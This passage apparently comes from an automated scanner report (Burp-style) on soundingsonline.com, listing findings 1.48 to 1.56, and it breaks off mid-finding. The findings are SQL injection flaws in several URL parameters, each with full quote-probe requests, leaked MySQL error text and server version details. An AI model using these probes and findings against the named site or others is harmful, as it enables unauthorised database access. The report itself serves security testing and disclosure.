GET /index.php?option=com_content&view=category&layout=blog''&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.48. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /index.php?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 25 Jan 2011 02:48:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html

Request 2

GET /index.php?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.49. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact&chronoformname=CGPage&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact&chronoformname=CGPage&1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.50. http://www.soundingsonline.com/index.php [option parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The option parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the option parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact'&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact''&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.51. http://www.soundingsonline.com/index.php [view parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The view parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the view parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category'&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category''&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.52. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /more/digital-publications?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /more/digital-publications?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.53. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /more/the-masters-series?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /more/the-masters-series?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.54. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.55. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/coastwise?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/coastwise?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.56. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

